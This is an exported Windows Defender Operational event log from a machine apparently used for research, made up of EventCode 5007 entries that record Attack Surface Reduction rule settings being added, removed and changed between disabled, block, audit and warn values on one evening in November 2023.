Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=546
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x0
New value:
11/14/2023 10:20:24 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=545
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x0
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=544
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=543
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=542
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=541
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=540
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=539
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=538
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=537
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=536
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=535
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=534
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=533
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=532
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=531
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=530
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x2
New value:
11/14/2023 10:20:23 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=529
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x0
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=528
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x2
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=527
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x2
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=526
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x2
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=525
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x2
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=524
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x2
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=523
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x2
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=522
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x2
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=521
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x2
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=520
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x2
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=519
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x2
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=518
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x2
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=517
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x2
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=516
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x2
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=515
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x2
11/14/2023 10:20:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=514
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x2
11/14/2023 10:17:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=513
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x2
New value:
11/14/2023 10:17:43 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=512
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x2
11/14/2023 10:17:43 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=511
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x2
11/14/2023 10:12:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=510
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x2
New value:
11/14/2023 10:12:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=509
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6
11/14/2023 10:08:58 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=508
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x2
New value:
11/14/2023 10:08:58 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=507
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x2
11/14/2023 10:07:53 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=506
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x2
New value:
11/14/2023 10:07:53 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=505
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x2
11/14/2023 09:57:38 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=502
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 d1e49aac-8f56-4280-b9ba-993a6d77406c e6db77e5-3df2-4cf1-b95a-636979351e5b c1db55ab-c21a-4637-bb3f-a12568109d35 3B576869-A4EC-4529-8536-B80A7769E899 56a863a9-875e-4185-98a7-b882c64b5ce5 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c 26190899-1602-49e8-8b27-eb1d0a1ce869 D4F940AB-401B-4EFC-AADC-AD5F3C50688A 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 D3E037E1-3EB8-44C8-A917-57927947596D 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1
New value:
11/14/2023 09:57:38 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=501
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x2
11/14/2023 09:44:45 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=500
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x0
New value:
11/14/2023 09:44:45 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=499
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 d1e49aac-8f56-4280-b9ba-993a6d77406c e6db77e5-3df2-4cf1-b95a-636979351e5b c1db55ab-c21a-4637-bb3f-a12568109d35 3B576869-A4EC-4529-8536-B80A7769E899 56a863a9-875e-4185-98a7-b882c64b5ce5 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c 26190899-1602-49e8-8b27-eb1d0a1ce869 D4F940AB-401B-4EFC-AADC-AD5F3C50688A 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 D3E037E1-3EB8-44C8-A917-57927947596D 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1
11/14/2023 09:44:31 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=498
Keywords=None
TaskCategory=None
